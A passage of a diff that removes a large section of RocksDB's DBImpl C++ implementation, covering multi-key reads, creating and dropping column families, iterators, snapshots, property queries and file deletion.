-  PERF_TIMER_STOP(get_snapshot_time);
-
-  // For each of the given keys, apply the entire "get" process as follows:
-  // First look in the memtable, then in the immutable memtable (if any).
-  // s is both in/out. When in, s could either be OK or MergeInProgress.
-  // merge_operands will contain the sequence of merges in the latter case.
-  for (size_t i = 0; i < num_keys; ++i) {
-    merge_context.Clear();
-    Status& s = stat_list[i];
-    std::string* value = &(*values)[i];
-
-    LookupKey lkey(keys[i], snapshot);
-    auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family[i]);
-    RangeDelAggregator range_del_agg(cfh->cfd()->internal_comparator(),
-                                     snapshot);
-    auto mgd_iter = multiget_cf_data.find(cfh->cfd()->GetID());
-    assert(mgd_iter != multiget_cf_data.end());
-    auto mgd = mgd_iter->second;
-    auto super_version = mgd->super_version;
-    bool skip_memtable =
-        (read_options.read_tier == kPersistedTier &&
-         has_unpersisted_data_.load(std::memory_order_relaxed));
-    bool done = false;
-    if (!skip_memtable) {
-      if (super_version->mem->Get(lkey, value, &s, &merge_context,
-                                  &range_del_agg, read_options)) {
-        done = true;
-        // TODO(?): RecordTick(stats_, MEMTABLE_HIT)?
-      } else if (super_version->imm->Get(lkey, value, &s, &merge_context,
-                                         &range_del_agg, read_options)) {
-        done = true;
-        // TODO(?): RecordTick(stats_, MEMTABLE_HIT)?
-      }
-    }
-    if (!done) {
-      PinnableSlice pinnable_val;
-      PERF_TIMER_GUARD(get_from_output_files_time);
-      super_version->current->Get(read_options, lkey, &pinnable_val, &s,
-                                  &merge_context, &range_del_agg);
-      value->assign(pinnable_val.data(), pinnable_val.size());
-      // TODO(?): RecordTick(stats_, MEMTABLE_MISS)?
-    }
-
-    if (s.ok()) {
-      bytes_read += value->size();
-    }
-  }
-
-  // Post processing (decrement reference counts and record statistics)
-  PERF_TIMER_GUARD(get_post_process_time);
-  autovector<SuperVersion*> superversions_to_delete;
-
-  // TODO(icanadi) do we need lock here or just around Cleanup()?
-  mutex_.Lock();
-  for (auto mgd_iter : multiget_cf_data) {
-    auto mgd = mgd_iter.second;
-    if (mgd->super_version->Unref()) {
-      mgd->super_version->Cleanup();
-      superversions_to_delete.push_back(mgd->super_version);
-    }
-  }
-  mutex_.Unlock();
-
-  for (auto td : superversions_to_delete) {
-    delete td;
-  }
-  for (auto mgd : multiget_cf_data) {
-    delete mgd.second;
-  }
-
-  RecordTick(stats_, NUMBER_MULTIGET_CALLS);
-  RecordTick(stats_, NUMBER_MULTIGET_KEYS_READ, num_keys);
-  RecordTick(stats_, NUMBER_MULTIGET_BYTES_READ, bytes_read);
-  MeasureTime(stats_, BYTES_PER_MULTIGET, bytes_read);
-  PERF_COUNTER_ADD(multiget_read_bytes, bytes_read);
-  PERF_TIMER_STOP(get_post_process_time);
-
-  return stat_list;
-}
-
-Status DBImpl::CreateColumnFamily(const ColumnFamilyOptions& cf_options,
-                                  const std::string& column_family,
-                                  ColumnFamilyHandle** handle) {
-  assert(handle != nullptr);
-  Status s = CreateColumnFamilyImpl(cf_options, column_family, handle);
-  if (s.ok()) {
-    s = WriteOptionsFile(true /*need_mutex_lock*/,
-                         true /*need_enter_write_thread*/);
-  }
-  return s;
-}
-
-Status DBImpl::CreateColumnFamilies(
-    const ColumnFamilyOptions& cf_options,
-    const std::vector<std::string>& column_family_names,
-    std::vector<ColumnFamilyHandle*>* handles) {
-  assert(handles != nullptr);
-  handles->clear();
-  size_t num_cf = column_family_names.size();
-  Status s;
-  bool success_once = false;
-  for (size_t i = 0; i < num_cf; i++) {
-    ColumnFamilyHandle* handle;
-    s = CreateColumnFamilyImpl(cf_options, column_family_names[i], &handle);
-    if (!s.ok()) {
-      break;
-    }
-    handles->push_back(handle);
-    success_once = true;
-  }
-  if (success_once) {
-    Status persist_options_status = WriteOptionsFile(
-        true /*need_mutex_lock*/, true /*need_enter_write_thread*/);
-    if (s.ok() && !persist_options_status.ok()) {
-      s = persist_options_status;
-    }
-  }
-  return s;
-}
-
-Status DBImpl::CreateColumnFamilies(
-    const std::vector<ColumnFamilyDescriptor>& column_families,
-    std::vector<ColumnFamilyHandle*>* handles) {
-  assert(handles != nullptr);
-  handles->clear();
-  size_t num_cf = column_families.size();
-  Status s;
-  bool success_once = false;
-  for (size_t i = 0; i < num_cf; i++) {
-    ColumnFamilyHandle* handle;
-    s = CreateColumnFamilyImpl(column_families[i].options,
-                               column_families[i].name, &handle);
-    if (!s.ok()) {
-      break;
-    }
-    handles->push_back(handle);
-    success_once = true;
-  }
-  if (success_once) {
-    Status persist_options_status = WriteOptionsFile(
-        true /*need_mutex_lock*/, true /*need_enter_write_thread*/);
-    if (s.ok() && !persist_options_status.ok()) {
-      s = persist_options_status;
-    }
-  }
-  return s;
-}
-
-Status DBImpl::CreateColumnFamilyImpl(const ColumnFamilyOptions& cf_options,
-                                      const std::string& column_family_name,
-                                      ColumnFamilyHandle** handle) {
-  Status s;
-  Status persist_options_status;
-  *handle = nullptr;
-
-  s = CheckCompressionSupported(cf_options);
-  if (s.ok() && immutable_db_options_.allow_concurrent_memtable_write) {
-    s = CheckConcurrentWritesSupported(cf_options);
-  }
-  if (!s.ok()) {
-    return s;
-  }
-
-  {
-    InstrumentedMutexLock l(&mutex_);
-
-    if (versions_->GetColumnFamilySet()->GetColumnFamily(column_family_name) !=
-        nullptr) {
-      return Status::InvalidArgument("Column family already exists");
-    }
-    VersionEdit edit;
-    edit.AddColumnFamily(column_family_name);
-    uint32_t new_id = versions_->GetColumnFamilySet()->GetNextColumnFamilyID();
-    edit.SetColumnFamily(new_id);
-    edit.SetLogNumber(logfile_number_);
-    edit.SetComparatorName(cf_options.comparator->Name());
-
-    // LogAndApply will both write the creation in MANIFEST and create
-    // ColumnFamilyData object
-    {  // write thread
-      WriteThread::Writer w;
-      write_thread_.EnterUnbatched(&w, &mutex_);
-      // LogAndApply will both write the creation in MANIFEST and create
-      // ColumnFamilyData object
-      s = versions_->LogAndApply(nullptr, MutableCFOptions(cf_options), &edit,
-                                 &mutex_, directories_.GetDbDir(), false,
-                                 &cf_options);
-      write_thread_.ExitUnbatched(&w);
-    }
-    if (s.ok()) {
-      single_column_family_mode_ = false;
-      auto* cfd =
-          versions_->GetColumnFamilySet()->GetColumnFamily(column_family_name);
-      assert(cfd != nullptr);
-      delete InstallSuperVersionAndScheduleWork(
-          cfd, nullptr, *cfd->GetLatestMutableCFOptions());
-
-      if (!cfd->mem()->IsSnapshotSupported()) {
-        is_snapshot_supported_ = false;
-      }
-
-      cfd->set_initialized();
-
-      *handle = new ColumnFamilyHandleImpl(cfd, this, &mutex_);
-      ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                     "Created column family [%s] (ID %u)",
-                     column_family_name.c_str(), (unsigned)cfd->GetID());
-    } else {
-      ROCKS_LOG_ERROR(immutable_db_options_.info_log,
-                      "Creating column family [%s] FAILED -- %s",
-                      column_family_name.c_str(), s.ToString().c_str());
-    }
-  }  // InstrumentedMutexLock l(&mutex_)
-
-  // this is outside the mutex
-  if (s.ok()) {
-    NewThreadStatusCfInfo(
-        reinterpret_cast<ColumnFamilyHandleImpl*>(*handle)->cfd());
-  }
-  return s;
-}
-
-Status DBImpl::DropColumnFamily(ColumnFamilyHandle* column_family) {
-  assert(column_family != nullptr);
-  Status s = DropColumnFamilyImpl(column_family);
-  if (s.ok()) {
-    s = WriteOptionsFile(true /*need_mutex_lock*/,
-                         true /*need_enter_write_thread*/);
-  }
-  return s;
-}
-
-Status DBImpl::DropColumnFamilies(
-    const std::vector<ColumnFamilyHandle*>& column_families) {
-  Status s;
-  bool success_once = false;
-  for (auto* handle : column_families) {
-    s = DropColumnFamilyImpl(handle);
-    if (!s.ok()) {
-      break;
-    }
-    success_once = true;
-  }
-  if (success_once) {
-    Status persist_options_status = WriteOptionsFile(
-        true /*need_mutex_lock*/, true /*need_enter_write_thread*/);
-    if (s.ok() && !persist_options_status.ok()) {
-      s = persist_options_status;
-    }
-  }
-  return s;
-}
-
-Status DBImpl::DropColumnFamilyImpl(ColumnFamilyHandle* column_family) {
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-  if (cfd->GetID() == 0) {
-    return Status::InvalidArgument("Can't drop default column family");
-  }
-
-  bool cf_support_snapshot = cfd->mem()->IsSnapshotSupported();
-
-  VersionEdit edit;
-  edit.DropColumnFamily();
-  edit.SetColumnFamily(cfd->GetID());
-
-  Status s;
-  {
-    InstrumentedMutexLock l(&mutex_);
-    if (cfd->IsDropped()) {
-      s = Status::InvalidArgument("Column family already dropped!\n");
-    }
-    if (s.ok()) {
-      // we drop column family from a single write thread
-      WriteThread::Writer w;
-      write_thread_.EnterUnbatched(&w, &mutex_);
-      s = versions_->LogAndApply(cfd, *cfd->GetLatestMutableCFOptions(),
-                                 &edit, &mutex_);
-      write_thread_.ExitUnbatched(&w);
-    }
-    if (s.ok()) {
-      auto* mutable_cf_options = cfd->GetLatestMutableCFOptions();
-      max_total_in_memory_state_ -= mutable_cf_options->write_buffer_size *
-                                    mutable_cf_options->max_write_buffer_number;
-    }
-
-    if (!cf_support_snapshot) {
-      // Dropped Column Family doesn't support snapshot. Need to recalculate
-      // is_snapshot_supported_.
-      bool new_is_snapshot_supported = true;
-      for (auto c : *versions_->GetColumnFamilySet()) {
-        if (!c->IsDropped() && !c->mem()->IsSnapshotSupported()) {
-          new_is_snapshot_supported = false;
-          break;
-        }
-      }
-      is_snapshot_supported_ = new_is_snapshot_supported;
-    }
-  }
-
-  if (s.ok()) {
-    // Note that here we erase the associated cf_info of the to-be-dropped
-    // cfd before its ref-count goes to zero to avoid having to erase cf_info
-    // later inside db_mutex.
-    EraseThreadStatusCfInfo(cfd);
-    assert(cfd->IsDropped());
-    ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                   "Dropped column family with id %u\n", cfd->GetID());
-  } else {
-    ROCKS_LOG_ERROR(immutable_db_options_.info_log,
-                    "Dropping column family with id %u FAILED -- %s\n",
-                    cfd->GetID(), s.ToString().c_str());
-  }
-
-  return s;
-}
-
-bool DBImpl::KeyMayExist(const ReadOptions& read_options,
-                         ColumnFamilyHandle* column_family, const Slice& key,
-                         std::string* value, bool* value_found) {
-  assert(value != nullptr);
-  if (value_found != nullptr) {
-    // falsify later if key-may-exist but can't fetch value
-    *value_found = true;
-  }
-  ReadOptions roptions = read_options;
-  roptions.read_tier = kBlockCacheTier; // read from block cache only
-  PinnableSlice pinnable_val;
-  auto s = GetImpl(roptions, column_family, key, &pinnable_val, value_found);
-  value->assign(pinnable_val.data(), pinnable_val.size());
-
-  // If block_cache is enabled and the index block of the table didn't
-  // not present in block_cache, the return value will be Status::Incomplete.
-  // In this case, key may still exist in the table.
-  return s.ok() || s.IsIncomplete();
-}
-
-Iterator* DBImpl::NewIterator(const ReadOptions& read_options,
-                              ColumnFamilyHandle* column_family) {
-  if (read_options.read_tier == kPersistedTier) {
-    return NewErrorIterator(Status::NotSupported(
-        "ReadTier::kPersistedData is not yet supported in iterators."));
-  }
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-  if (read_options.managed) {
-#ifdef ROCKSDB_LITE
-    // not supported in lite version
-    return NewErrorIterator(Status::InvalidArgument(
-        "Managed Iterators not supported in RocksDBLite."));
-#else
-    if ((read_options.tailing) || (read_options.snapshot != nullptr) ||
-        (is_snapshot_supported_)) {
-      return new ManagedIterator(this, read_options, cfd);
-    }
-    // Managed iter not supported
-    return NewErrorIterator(Status::InvalidArgument(
-        "Managed Iterators not supported without snapshots."));
-#endif
-  } else if (read_options.tailing) {
-#ifdef ROCKSDB_LITE
-    // not supported in lite version
-    return nullptr;
-#else
-    SuperVersion* sv = cfd->GetReferencedSuperVersion(&mutex_);
-    auto iter = new ForwardIterator(this, read_options, cfd, sv);
-    return NewDBIterator(
-        env_, read_options, *cfd->ioptions(), cfd->user_comparator(), iter,
-        kMaxSequenceNumber,
-        sv->mutable_cf_options.max_sequential_skip_in_iterations);
-#endif
-  } else {
-    SequenceNumber latest_snapshot = versions_->LastSequence();
-    auto snapshot =
-        read_options.snapshot != nullptr
-            ? reinterpret_cast<const SnapshotImpl*>(read_options.snapshot)
-                  ->number_
-            : latest_snapshot;
-    return NewIteratorImpl(read_options, cfd, snapshot);
-  }
-  // To stop compiler from complaining
-  return nullptr;
-}
-
-ArenaWrappedDBIter* DBImpl::NewIteratorImpl(const ReadOptions& read_options,
-                                            ColumnFamilyData* cfd,
-                                            SequenceNumber snapshot,
-                                            bool allow_blob) {
-  SuperVersion* sv = cfd->GetReferencedSuperVersion(&mutex_);
-
-  // Try to generate a DB iterator tree in continuous memory area to be
-  // cache friendly. Here is an example of result:
-  // +-------------------------------+
-  // |                               |
-  // | ArenaWrappedDBIter            |
-  // |  +                            |
-  // |  +---> Inner Iterator   ------------+
-  // |  |                            |     |
-  // |  |    +-- -- -- -- -- -- -- --+     |
-  // |  +--- | Arena                 |     |
-  // |       |                       |     |
-  // |          Allocated Memory:    |     |
-  // |       |   +-------------------+     |
-  // |       |   | DBIter            | <---+
-  // |           |  +                |
-  // |       |   |  +-> iter_  ------------+
-  // |       |   |                   |     |
-  // |       |   +-------------------+     |
-  // |       |   | MergingIterator   | <---+
-  // |           |  +                |
-  // |       |   |  +->child iter1  ------------+
-  // |       |   |  |                |          |
-  // |           |  +->child iter2  ----------+ |
-  // |       |   |  |                |        | |
-  // |       |   |  +->child iter3  --------+ | |
-  // |           |                   |      | | |
-  // |       |   +-------------------+      | | |
-  // |       |   | Iterator1         | <--------+
-  // |       |   +-------------------+      | |
-  // |       |   | Iterator2         | <------+
-  // |       |   +-------------------+      |
-  // |       |   | Iterator3         | <----+
-  // |       |   +-------------------+
-  // |       |                       |
-  // +-------+-----------------------+
-  //
-  // ArenaWrappedDBIter inlines an arena area where all the iterators in
-  // the iterator tree are allocated in the order of being accessed when
-  // querying.
-  // Laying out the iterators in the order of being accessed makes it more
-  // likely that any iterator pointer is close to the iterator it points to so
-  // that they are likely to be in the same cache line and/or page.
-  ArenaWrappedDBIter* db_iter = NewArenaWrappedDbIterator(
-      env_, read_options, *cfd->ioptions(), snapshot,
-      sv->mutable_cf_options.max_sequential_skip_in_iterations,
-      sv->version_number, ((read_options.snapshot != nullptr) ? nullptr : this),
-      cfd, allow_blob);
-
-  InternalIterator* internal_iter =
-      NewInternalIterator(read_options, cfd, sv, db_iter->GetArena(),
-                          db_iter->GetRangeDelAggregator());
-  db_iter->SetIterUnderDBIter(internal_iter);
-
-  return db_iter;
-}
-
-Status DBImpl::NewIterators(
-    const ReadOptions& read_options,
-    const std::vector<ColumnFamilyHandle*>& column_families,
-    std::vector<Iterator*>* iterators) {
-  if (read_options.read_tier == kPersistedTier) {
-    return Status::NotSupported(
-        "ReadTier::kPersistedData is not yet supported in iterators.");
-  }
-  iterators->clear();
-  iterators->reserve(column_families.size());
-  if (read_options.managed) {
-#ifdef ROCKSDB_LITE
-    return Status::InvalidArgument(
-        "Managed interator not supported in RocksDB lite");
-#else
-    if ((!read_options.tailing) && (read_options.snapshot == nullptr) &&
-        (!is_snapshot_supported_)) {
-      return Status::InvalidArgument(
-          "Managed interator not supported without snapshots");
-    }
-    for (auto cfh : column_families) {
-      auto cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(cfh)->cfd();
-      auto iter = new ManagedIterator(this, read_options, cfd);
-      iterators->push_back(iter);
-    }
-#endif
-  } else if (read_options.tailing) {
-#ifdef ROCKSDB_LITE
-    return Status::InvalidArgument(
-        "Tailing interator not supported in RocksDB lite");
-#else
-    for (auto cfh : column_families) {
-      auto cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(cfh)->cfd();
-      SuperVersion* sv = cfd->GetReferencedSuperVersion(&mutex_);
-      auto iter = new ForwardIterator(this, read_options, cfd, sv);
-      iterators->push_back(NewDBIterator(
-          env_, read_options, *cfd->ioptions(), cfd->user_comparator(), iter,
-          kMaxSequenceNumber,
-          sv->mutable_cf_options.max_sequential_skip_in_iterations));
-    }
-#endif
-  } else {
-    SequenceNumber latest_snapshot = versions_->LastSequence();
-    auto snapshot =
-        read_options.snapshot != nullptr
-            ? reinterpret_cast<const SnapshotImpl*>(read_options.snapshot)
-                  ->number_
-            : latest_snapshot;
-
-    for (size_t i = 0; i < column_families.size(); ++i) {
-      auto* cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(
-          column_families[i])->cfd();
-      iterators->push_back(NewIteratorImpl(read_options, cfd, snapshot));
-    }
-  }
-
-  return Status::OK();
-}
-
-const Snapshot* DBImpl::GetSnapshot() { return GetSnapshotImpl(false); }
-
-#ifndef ROCKSDB_LITE
-const Snapshot* DBImpl::GetSnapshotForWriteConflictBoundary() {
-  return GetSnapshotImpl(true);
-}
-#endif  // ROCKSDB_LITE
-
-const Snapshot* DBImpl::GetSnapshotImpl(bool is_write_conflict_boundary) {
-  int64_t unix_time = 0;
-  env_->GetCurrentTime(&unix_time);  // Ignore error
-  SnapshotImpl* s = new SnapshotImpl;
-
-  InstrumentedMutexLock l(&mutex_);
-  // returns null if the underlying memtable does not support snapshot.
-  if (!is_snapshot_supported_) {
-    delete s;
-    return nullptr;
-  }
-  return snapshots_.New(s, versions_->LastSequence(), unix_time,
-                        is_write_conflict_boundary);
-}
-
-void DBImpl::ReleaseSnapshot(const Snapshot* s) {
-  const SnapshotImpl* casted_s = reinterpret_cast<const SnapshotImpl*>(s);
-  {
-    InstrumentedMutexLock l(&mutex_);
-    snapshots_.Delete(casted_s);
-  }
-  delete casted_s;
-}
-
-bool DBImpl::HasActiveSnapshotInRange(SequenceNumber lower_bound,
-                                      SequenceNumber upper_bound) {
-  InstrumentedMutexLock l(&mutex_);
-  return snapshots_.HasSnapshotInRange(lower_bound, upper_bound);
-}
-
-#ifndef ROCKSDB_LITE
-Status DBImpl::GetPropertiesOfAllTables(ColumnFamilyHandle* column_family,
-                                        TablePropertiesCollection* props) {
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-
-  // Increment the ref count
-  mutex_.Lock();
-  auto version = cfd->current();
-  version->Ref();
-  mutex_.Unlock();
-
-  auto s = version->GetPropertiesOfAllTables(props);
-
-  // Decrement the ref count
-  mutex_.Lock();
-  version->Unref();
-  mutex_.Unlock();
-
-  return s;
-}
-
-Status DBImpl::GetPropertiesOfTablesInRange(ColumnFamilyHandle* column_family,
-                                            const Range* range, std::size_t n,
-                                            TablePropertiesCollection* props) {
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-
-  // Increment the ref count
-  mutex_.Lock();
-  auto version = cfd->current();
-  version->Ref();
-  mutex_.Unlock();
-
-  auto s = version->GetPropertiesOfTablesInRange(range, n, props);
-
-  // Decrement the ref count
-  mutex_.Lock();
-  version->Unref();
-  mutex_.Unlock();
-
-  return s;
-}
-
-#endif  // ROCKSDB_LITE
-
-const std::string& DBImpl::GetName() const {
-  return dbname_;
-}
-
-Env* DBImpl::GetEnv() const {
-  return env_;
-}
-
-Options DBImpl::GetOptions(ColumnFamilyHandle* column_family) const {
-  InstrumentedMutexLock l(&mutex_);
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  return Options(BuildDBOptions(immutable_db_options_, mutable_db_options_),
-                 cfh->cfd()->GetLatestCFOptions());
-}
-
-DBOptions DBImpl::GetDBOptions() const {
-  InstrumentedMutexLock l(&mutex_);
-  return BuildDBOptions(immutable_db_options_, mutable_db_options_);
-}
-
-bool DBImpl::GetProperty(ColumnFamilyHandle* column_family,
-                         const Slice& property, std::string* value) {
-  const DBPropertyInfo* property_info = GetPropertyInfo(property);
-  value->clear();
-  auto cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family)->cfd();
-  if (property_info == nullptr) {
-    return false;
-  } else if (property_info->handle_int) {
-    uint64_t int_value;
-    bool ret_value =
-        GetIntPropertyInternal(cfd, *property_info, false, &int_value);
-    if (ret_value) {
-      *value = ToString(int_value);
-    }
-    return ret_value;
-  } else if (property_info->handle_string) {
-    InstrumentedMutexLock l(&mutex_);
-    return cfd->internal_stats()->GetStringProperty(*property_info, property,
-                                                    value);
-  }
-  // Shouldn't reach here since exactly one of handle_string and handle_int
-  // should be non-nullptr.
-  assert(false);
-  return false;
-}
-
-bool DBImpl::GetMapProperty(ColumnFamilyHandle* column_family,
-                            const Slice& property,
-                            std::map<std::string, double>* value) {
-  const DBPropertyInfo* property_info = GetPropertyInfo(property);
-  value->clear();
-  auto cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family)->cfd();
-  if (property_info == nullptr) {
-    return false;
-  } else if (property_info->handle_map) {
-    InstrumentedMutexLock l(&mutex_);
-    return cfd->internal_stats()->GetMapProperty(*property_info, property,
-                                                 value);
-  }
-  // If we reach this point it means that handle_map is not provided for the
-  // requested property
-  return false;
-}
-
-bool DBImpl::GetIntProperty(ColumnFamilyHandle* column_family,
-                            const Slice& property, uint64_t* value) {
-  const DBPropertyInfo* property_info = GetPropertyInfo(property);
-  if (property_info == nullptr || property_info->handle_int == nullptr) {
-    return false;
-  }
-  auto cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family)->cfd();
-  return GetIntPropertyInternal(cfd, *property_info, false, value);
-}
-
-bool DBImpl::GetIntPropertyInternal(ColumnFamilyData* cfd,
-                                    const DBPropertyInfo& property_info,
-                                    bool is_locked, uint64_t* value) {
-  assert(property_info.handle_int != nullptr);
-  if (!property_info.need_out_of_mutex) {
-    if (is_locked) {
-      mutex_.AssertHeld();
-      return cfd->internal_stats()->GetIntProperty(property_info, value, this);
-    } else {
-      InstrumentedMutexLock l(&mutex_);
-      return cfd->internal_stats()->GetIntProperty(property_info, value, this);
-    }
-  } else {
-    SuperVersion* sv = nullptr;
-    if (!is_locked) {
-      sv = GetAndRefSuperVersion(cfd);
-    } else {
-      sv = cfd->GetSuperVersion();
-    }
-
-    bool ret = cfd->internal_stats()->GetIntPropertyOutOfMutex(
-        property_info, sv->current, value);
-
-    if (!is_locked) {
-      ReturnAndCleanupSuperVersion(cfd, sv);
-    }
-
-    return ret;
-  }
-}
-
-#ifndef ROCKSDB_LITE
-Status DBImpl::ResetStats() {
-  InstrumentedMutexLock l(&mutex_);
-  for (auto* cfd : *versions_->GetColumnFamilySet()) {
-    if (cfd->initialized()) {
-      cfd->internal_stats()->Clear();
-    }
-  }
-  return Status::OK();
-}
-#endif  // ROCKSDB_LITE
-
-bool DBImpl::GetAggregatedIntProperty(const Slice& property,
-                                      uint64_t* aggregated_value) {
-  const DBPropertyInfo* property_info = GetPropertyInfo(property);
-  if (property_info == nullptr || property_info->handle_int == nullptr) {
-    return false;
-  }
-
-  uint64_t sum = 0;
-  {
-    // Needs mutex to protect the list of column families.
-    InstrumentedMutexLock l(&mutex_);
-    uint64_t value;
-    for (auto* cfd : *versions_->GetColumnFamilySet()) {
-      if (!cfd->initialized()) {
-        continue;
-      }
-      if (GetIntPropertyInternal(cfd, *property_info, true, &value)) {
-        sum += value;
-      } else {
-        return false;
-      }
-    }
-  }
-  *aggregated_value = sum;
-  return true;
-}
-
-SuperVersion* DBImpl::GetAndRefSuperVersion(ColumnFamilyData* cfd) {
-  // TODO(ljin): consider using GetReferencedSuperVersion() directly
-  return cfd->GetThreadLocalSuperVersion(&mutex_);
-}
-
-// REQUIRED: this function should only be called on the write thread or if the
-// mutex is held.
-SuperVersion* DBImpl::GetAndRefSuperVersion(uint32_t column_family_id) {
-  auto column_family_set = versions_->GetColumnFamilySet();
-  auto cfd = column_family_set->GetColumnFamily(column_family_id);
-  if (!cfd) {
-    return nullptr;
-  }
-
-  return GetAndRefSuperVersion(cfd);
-}
-
-void DBImpl::ReturnAndCleanupSuperVersion(ColumnFamilyData* cfd,
-                                          SuperVersion* sv) {
-  bool unref_sv = !cfd->ReturnThreadLocalSuperVersion(sv);
-
-  if (unref_sv) {
-    // Release SuperVersion
-    if (sv->Unref()) {
-      {
-        InstrumentedMutexLock l(&mutex_);
-        sv->Cleanup();
-      }
-      delete sv;
-      RecordTick(stats_, NUMBER_SUPERVERSION_CLEANUPS);
-    }
-    RecordTick(stats_, NUMBER_SUPERVERSION_RELEASES);
-  }
-}
-
-// REQUIRED: this function should only be called on the write thread.
-void DBImpl::ReturnAndCleanupSuperVersion(uint32_t column_family_id,
-                                          SuperVersion* sv) {
-  auto column_family_set = versions_->GetColumnFamilySet();
-  auto cfd = column_family_set->GetColumnFamily(column_family_id);
-
-  // If SuperVersion is held, and we successfully fetched a cfd using
-  // GetAndRefSuperVersion(), it must still exist.
-  assert(cfd != nullptr);
-  ReturnAndCleanupSuperVersion(cfd, sv);
-}
-
-// REQUIRED: this function should only be called on the write thread or if the
-// mutex is held.
-ColumnFamilyHandle* DBImpl::GetColumnFamilyHandle(uint32_t column_family_id) {
-  ColumnFamilyMemTables* cf_memtables = column_family_memtables_.get();
-
-  if (!cf_memtables->Seek(column_family_id)) {
-    return nullptr;
-  }
-
-  return cf_memtables->GetColumnFamilyHandle();
-}
-
-// REQUIRED: mutex is NOT held.
-ColumnFamilyHandle* DBImpl::GetColumnFamilyHandleUnlocked(
-    uint32_t column_family_id) {
-  ColumnFamilyMemTables* cf_memtables = column_family_memtables_.get();
-
-  InstrumentedMutexLock l(&mutex_);
-
-  if (!cf_memtables->Seek(column_family_id)) {
-    return nullptr;
-  }
-
-  return cf_memtables->GetColumnFamilyHandle();
-}
-
-void DBImpl::GetApproximateMemTableStats(ColumnFamilyHandle* column_family,
-                                         const Range& range,
-                                         uint64_t* const count,
-                                         uint64_t* const size) {
-  ColumnFamilyHandleImpl* cfh =
-      reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  ColumnFamilyData* cfd = cfh->cfd();
-  SuperVersion* sv = GetAndRefSuperVersion(cfd);
-
-  // Convert user_key into a corresponding internal key.
-  InternalKey k1(range.start, kMaxSequenceNumber, kValueTypeForSeek);
-  InternalKey k2(range.limit, kMaxSequenceNumber, kValueTypeForSeek);
-  MemTable::MemTableStats memStats =
-      sv->mem->ApproximateStats(k1.Encode(), k2.Encode());
-  MemTable::MemTableStats immStats =
-      sv->imm->ApproximateStats(k1.Encode(), k2.Encode());
-  *count = memStats.count + immStats.count;
-  *size = memStats.size + immStats.size;
-
-  ReturnAndCleanupSuperVersion(cfd, sv);
-}
-
-void DBImpl::GetApproximateSizes(ColumnFamilyHandle* column_family,
-                                 const Range* range, int n, uint64_t* sizes,
-                                 uint8_t include_flags) {
-  assert(include_flags & DB::SizeApproximationFlags::INCLUDE_FILES ||
-         include_flags & DB::SizeApproximationFlags::INCLUDE_MEMTABLES);
-  Version* v;
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-  SuperVersion* sv = GetAndRefSuperVersion(cfd);
-  v = sv->current;
-
-  for (int i = 0; i < n; i++) {
-    // Convert user_key into a corresponding internal key.
-    InternalKey k1(range[i].start, kMaxSequenceNumber, kValueTypeForSeek);
-    InternalKey k2(range[i].limit, kMaxSequenceNumber, kValueTypeForSeek);
-    sizes[i] = 0;
-    if (include_flags & DB::SizeApproximationFlags::INCLUDE_FILES) {
-      sizes[i] += versions_->ApproximateSize(v, k1.Encode(), k2.Encode());
-    }
-    if (include_flags & DB::SizeApproximationFlags::INCLUDE_MEMTABLES) {
-      sizes[i] += sv->mem->ApproximateStats(k1.Encode(), k2.Encode()).size;
-      sizes[i] += sv->imm->ApproximateStats(k1.Encode(), k2.Encode()).size;
-    }
-  }
-
-  ReturnAndCleanupSuperVersion(cfd, sv);
-}
-
-std::list<uint64_t>::iterator
-DBImpl::CaptureCurrentFileNumberInPendingOutputs() {
-  // We need to remember the iterator of our insert, because after the
-  // background job is done, we need to remove that element from
-  // pending_outputs_.
-  pending_outputs_.push_back(versions_->current_next_file_number());
-  auto pending_outputs_inserted_elem = pending_outputs_.end();
-  --pending_outputs_inserted_elem;
-  return pending_outputs_inserted_elem;
-}
-
-void DBImpl::ReleaseFileNumberFromPendingOutputs(
-    std::list<uint64_t>::iterator v) {
-  pending_outputs_.erase(v);
-}
-
-#ifndef ROCKSDB_LITE
-Status DBImpl::GetUpdatesSince(
-    SequenceNumber seq, unique_ptr<TransactionLogIterator>* iter,
-    const TransactionLogIterator::ReadOptions& read_options) {
-
-  RecordTick(stats_, GET_UPDATES_SINCE_CALLS);
-  if (seq > versions_->LastSequence()) {
-    return Status::NotFound("Requested sequence not yet written in the db");
-  }
-  return wal_manager_.GetUpdatesSince(seq, iter, read_options, versions_.get());
-}
-
-Status DBImpl::DeleteFile(std::string name) {
-  uint64_t number;
-  FileType type;
-  WalFileType log_type;
-  if (!ParseFileName(name, &number, &type, &log_type) ||
-      (type != kTableFile && type != kLogFile)) {
-    ROCKS_LOG_ERROR(immutable_db_options_.info_log, "DeleteFile %s failed.\n",
-                    name.c_str());
-    return Status::InvalidArgument("Invalid file name");
-  }
-
-  Status status;
-  if (type == kLogFile) {
-    // Only allow deleting archived log files
-    if (log_type != kArchivedLogFile) {
-      ROCKS_LOG_ERROR(immutable_db_options_.info_log,
-                      "DeleteFile %s failed - not archived log.\n",
-                      name.c_str());
-      return Status::NotSupported("Delete only supported for archived logs");
-    }
-    status =
-        env_->DeleteFile(immutable_db_options_.wal_dir + "/" + name.c_str());
-    if (!status.ok()) {
-      ROCKS_LOG_ERROR(immutable_db_options_.info_log,
-                      "DeleteFile %s failed -- %s.\n", name.c_str(),
-                      status.ToString().c_str());
-    }
-    return status;
-  }
-
-  int level;
-  FileMetaData* metadata;
-  ColumnFamilyData* cfd;
-  VersionEdit edit;
